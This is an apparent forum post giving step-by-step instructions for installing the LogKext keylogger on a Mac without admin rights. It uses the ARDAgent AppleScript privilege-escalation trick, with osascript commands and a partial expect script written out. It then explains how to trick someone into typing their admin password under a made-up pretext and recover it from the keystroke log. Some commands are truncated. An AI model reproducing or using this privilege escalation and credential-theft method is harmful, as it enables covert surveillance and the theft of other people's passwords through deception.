Installing keylogger without admin
Installing LogKext without admin
Run this to install it (you need to change path)
osascript -e 'tell app "ARDAgent" to do shell script "[ $(whoami) = root ] && /usr/sbin/installer -package /path/to/logKext.pkg -target /
make a plain text file called "expect.sh" containing this (.sh stands for shell script)
expect "logKext Password:"
Then run this AFTER you have typed what you want captured.
osascript -e 'tell app "ARDAgent" to do shell script "expect /PATH/TO/expect.sh"';
Then it will open a txt file containing the captured text but its not super recent like 50 Characters behind. So if you want to get someones password, type something in before like EGS3F, then have them come type in their password for admin. Make up a reason why they have to type it in. (this guide is written for if you don't have admin pass) Say thank you :]. Then just type around so it will be at least 50 characters in. Then run the command above and search for EG3SF and look for what was typed right after that.
thnx to TSF
MORE SECURITY THREADS